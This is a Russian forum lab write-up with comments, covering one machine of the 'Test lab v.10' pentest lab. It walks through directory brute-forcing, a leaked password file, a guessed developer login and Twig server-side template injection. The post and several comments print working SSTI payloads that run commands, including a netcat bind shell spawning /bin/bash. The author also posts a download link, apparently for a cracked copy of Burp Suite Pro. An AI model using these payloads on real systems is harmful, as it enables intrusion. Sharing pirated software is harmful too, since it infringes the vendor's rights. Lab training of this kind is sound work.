Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (5)

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 102
Глава 5
Предыдущая глава
Следующая глава
Оглавление

Injection-attacks-target-legit-websites-twenty-nine-thousand-sites-and-counting-Security4_1.jpg


Доброго времени суток друзья) Сегодня настало время очередного токена. А так же на этом таске мы попрактикуемся в таком интересном векторе атаки, как Template Injection Server Side ,и как обычно качнем немножко свое логическое мышление) Речь пойдем сегодня о Hall-Of-Fame(192.168.0.8) машине на топологии сети.

Сперва как всегда для удобной работы пробросим порт:
1.PNG


Далее знакомимся с веб приложением,гуляем по ссылкам,наблюдаем за поведением контента,изучаем передаваемые параметры и т.д:
2.PNG


Видим что GET-ом передается параметр hname и это очень похоже на то что там может быть LFI(Local File Inclusion) Но несколько часов я долбился в поисках этой уязвимости и увы безрезультатно...
Затем на ум пришло побрутить директории и файлы на этом веб сервере..
Тут стоит обратить внимания на инструмент которым мы будим брутить директории. Конечно можно и обычным dirbuster-ом пробрутить,но лично мне нравится очень инструмент dirsearch который как по мне в разы быстрее чем dirb или dirbuster)
Прогоняем этой утилитой наш зал славы(Hall-Of-Fame)
4.PNG

Находим интересную две интересные папки
/backup
и
/dev
Пробуем зайти на /dev
Нас встречает там Basic Auth аутентификация:
8.PNG


Пробрутив директорию /backup находим файлик passwords.txt:

5.PNG


В этой папке находим файлик с паролями,смотрим его.
6.PNG


Пробуем залогинится на /dev. Но увы не один логин пароль нам не подошел :(
Пробуем зайти на основной странице:
7.PNG


Наблюдаем и изучаем поведения контента после успешного логина под пользователем creator:
9.PNG

Ковыряли ковыряли,ничего не наковыряли... Не нашел я ничего тут...
Пробуем под другим пользователем залогинится:
10.PNG


А тут после логина нам вернуло какой то масив с данными:
11.PNG

Видим путь /dev/ и пароль 0bf190ffdc397fd51334d908845fbb1
Вспоминаем что по пути /dev у нас была аутентификация,идем туда и пробуем наш пароль под известными нам учетными записями.Но почему то нас не пускает ни под одной учетной записей..
Посидели,успокоились,подумали...
Тут включаем логику и начинаем думать о том какие еще могут быть учетные записи разработчика(developer), пробуем логин dev (сокращенно от developer) и наш полученный пароль и попадаем в каталог разработчика и видим что визуально поведение контента ничем не отличается:
12.PNG

Хм... Странно...
Кавыряемся,кавыряемся, паралельно запускаем сканеры уязвимостей,пускай работают.
Ну и на выходе сканер находит нам весьма интересный вектор уязвимостей:

14.PNG


Видим что в параметре hname нашло Template Injection и определило тип шаблонизатора Twig.
Server Side Template Injection - вектор атаки построен на принципе внедрения шаблона.
Вообщем гуглим вектор,вооружаемся знаниями и пробуем эксплуатировать.
Я расписывать не буду про этот вектор,так как очень доступно,подробно и хорошо об этом векторе расписано в этой_статье
Прочитав статью пробуем выяснить для практики и закрепления знаний попробуем выяснить тип шаблонизатора,не смотря на то что сканер сделал это уже за нас(всегда нужно стараться понимать тот или иной вектор уязвимости), самостоятельно по вот этой схеме:
1.png


Помним что у нас уязвимый параметр hname, валидируем вектор:

15.PNG


Видим что мы передали GET-ом hname=DarkNode {{7*'7'}} И нам вернуло в теге <title> DarkNode 49
Значит и вправду шаблонизатор Twig. Это все хорошо) Идем дальше)
Читаем внимательно статью и находим там уже готовый шаблон для RCE под шаблонизатор Twig:
Документация говорит, что Twig имеет обьект _self, который имеет атрибут env (является ссылкой на Twig_Evironment).В процессе чтения документации, мы приходим к рабочей полезной нагрузке {{_self.env.registerUndefinedFilterCallback(«exec»)}}{{_self.env.getFilter(«id»)}}

Пробуем нашу полезную нагрузку:

16.PNG


Ну вот вектор готов) Осталось бросить удаленный шелл и забрать токен)
Так как ssh(172.16.0.8) машина и Hall-Of-Fame(192.168.0.8) у нас находятся в разных сегментах сети,то тут мы сможем сделать только Bind Shell(Кто не понимает различие между Bind и Reverse шеллом - прочтите мою статью)

17.PNG
18.PNG
19.PNG






Всем спасибо)
Помни! Если понравилась статья - жмакни лайк , мне будет приятно)

Предыдущая глава
Следующая глава
Оглавление





 
Последнее редактирование:

ghostphisher

местный
Gold Team
07.12.2016
2 605
3 428
Словарь для подбора файлов на сервере составлялся самостоятельно или брался за основу уже существующий, проверенный временем? =)
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 102
Словарь для подбора файлов на сервере составлялся самостоятельно или брался за основу уже существующий, проверенный временем? =)
Нет,дефолтный словарь который идет вместе с dirsearch.py
 
  • Нравится
Реакции: ghostphisher

ghostphisher

местный
Gold Team
07.12.2016
2 605
3 428
Я использовал owasp-zap сканер, он тоже обнаружил данную уязвимость, но вопрос по утилите Burpsuite - как понимаю в данном случае это версия Pro и Pro открывает доступ к нетолько сканеру, но и другим возможностям. Но вопрос - технология сканирования разная или схожая, а Pro версия была приобретена ради доп функция Burpsuite?
 
  • Нравится
Реакции: <~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 102
Я использовал owasp-zap сканер, он тоже обнаружил данную уязвимость, но вопрос по утилите Burpsuite - как понимаю в данном случае это версия Pro и Pro открывает доступ к нетолько сканеру, но и другим возможностям. Но вопрос - технология сканирования разная или схожая, а Pro версия была приобретена ради доп функция Burpsuite?
Ну приобретена - не совсем подходящее слово) Да в Про версии есть сканер и да ,брутфорс быстрее работает,расширять дополнениями можно + другие интересные плюшки)
Могу поделится) Мне не жалко)
[hide=15]https://mega.nz/#!zkUSQYDT!gnWUOzOJzUlxWsVhqT_k6rsXOHgePkC9odFBvTM83B8
 
  • Нравится
Реакции: ghostphisher

ghostphisher

местный
Gold Team
07.12.2016
2 605
3 428
И совсем корявый вопрос =) http://127.0.0.1/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exeс")}}{{_self.env.getFilter("nc -e /bin/bash -nlp 1337")}}
Однако ....сырец выдает
”." class="error"><title>Top of the most famous hackers - | GDS</title><!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


Так как сработало у автора топика, у меня нет сомнений в моей ошибке, однако в чем. Порты проброшены, ресурс отвечает, защиту от xss отключил ( аддон по умолчанию в Моззиле). В чем проблема может быть? Браузер? неверная строчка? Упущена какая то мелочь?

ПС За Burp отдельный респект и уважени! ;)
 
Последнее редактирование:
  • Нравится
Реакции: <~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 102
И совсем корявый вопрос =) http://127.0.0.1/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exeс")}}{{_self.env.getFilter("nc -e /bin/bash -nlp 1337")}}
Однако ....сырец выдает
”." class="error"><title>Top of the most famous hackers - | GDS</title><!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


Так как сработало у автора топика, у меня нет сомнений в моей ошибке, однако в чем. Порты проброшены, ресурс отвечает, защиту от xss отключил ( аддон по умолчанию в Моззиле). В чем проблема может быть? Браузер? неверная строчка? Упущена какая то мелочь?

ПС За Burp отдельный респект и уважени! ;)
Попробуй сначала получить вывод команд id,pwd
Если и эти не отработают - знач где то косяк.
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Что касается нетката - то после команды:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc -nlp 1337 -e /bin/bash")}}

Браузер должен крутить колесико загрузки страницы пока не будет подключение от машины ssh(172.16.0.8)
Ты же с 172.16.0.8 подключаешся неткатом?

 
  • Нравится
Реакции: ghostphisher

ghostphisher

местный
Gold Team
07.12.2016
2 605
3 428
Ты же с 172.16.0.8 подключаешся неткатом?

1) ssh на 192.168.101.9
2) nc 192.168.0.8 1337
связи нет

браузер загружается и..просто открывает страницу =)

Если пробовать вставить своей имя - то все ок, в сырце мы его видим.
Пробовал разные браузеры.

Победил эту беду вот так
/dev/index.php?hname=GackGack%20{{7*%277%27}}%20{{_self.env.registerUndefinedFilterCallback%28%22exec%22%29}}{{_self.env.getFilter%28%22nc%20-nlp%201337%20-e%20/bin/bash%22%29}}
 
Последнее редактирование:
  • Нравится
Реакции: Sinistra и Dmitry88
K

KIra

И совсем корявый вопрос =) http://127.0.0.1/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exeс")}}{{_self.env.getFilter("nc -e /bin/bash -nlp 1337")}}
Однако ....сырец выдает
”." class="error"><title>Top of the most famous hackers - | GDS</title><!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


Так как сработало у автора топика, у меня нет сомнений в моей ошибке, однако в чем. Порты проброшены, ресурс отвечает, защиту от xss отключил ( аддон по умолчанию в Моззиле). В чем проблема может быть? Браузер? неверная строчка? Упущена какая то мелочь?

ПС За Burp отдельный респект и уважени! ;)
Тоже самое было, просто надо прописать вручную(там кавычки другие).
 

Chena

Green Team
10.02.2017
12
4
[email protected]:~$ nc 192.168.0.8 1337
(UNKNOWN) [192.168.0.8] 1337 (?) : Connection refused
И в чем может быть Ошибка ?
---------------------------------------------------------
[email protected]:~$ nc -e 192.168.0.8 -nlp 1337
.. Так через терминал выводит ....
[doublepost=1489516059,1489250032][/doublepost]Здравствуй ~~DarkNode~~ А почему ты переходил через export PS1="\... ? Оно отлично двигается через cd ../ . Спасибо Untitled-1.jpg
 
I

[ixTor]

это только у меня так показывает ?
<title>Top of the most famous hackers - hname=DarkNode {{7*'7'}} | GDS</title>
 

fdgdfgrgfgdf

Green Team
31.03.2017
23
4
Выдачи нет при команде id
<title>Top of the most famous hackers - | GDS</title>
Однако с умножением он справляется, подскажите


Я не прочел один из коментариев выше, вопрос отпал
 
S

SimpleMan

Я использовал owasp-zap сканер, он тоже обнаружил данную уязвимость, но вопрос по утилите Burpsuite - как понимаю в данном случае это версия Pro и Pro открывает доступ к нетолько сканеру, но и другим возможностям. Но вопрос - технология сканирования разная или схожая, а Pro версия была приобретена ради доп функция Burpsuite?
Сканировал также owasp zap' ом, но обнаружена была только xss (близкая к ssti, но все же не та уязвимость, хотя и лежащая в ее основе). Возможно я не так выбрал параметры при запуске (последовательность моих действий: "url to attack:http://127.0.0.1 -> Attack -> Просмотр результатов")?
1.png
В остальных обнаруженных уязвимостях также ничего похожего на ssti не нашел.
 
Мы в соцсетях: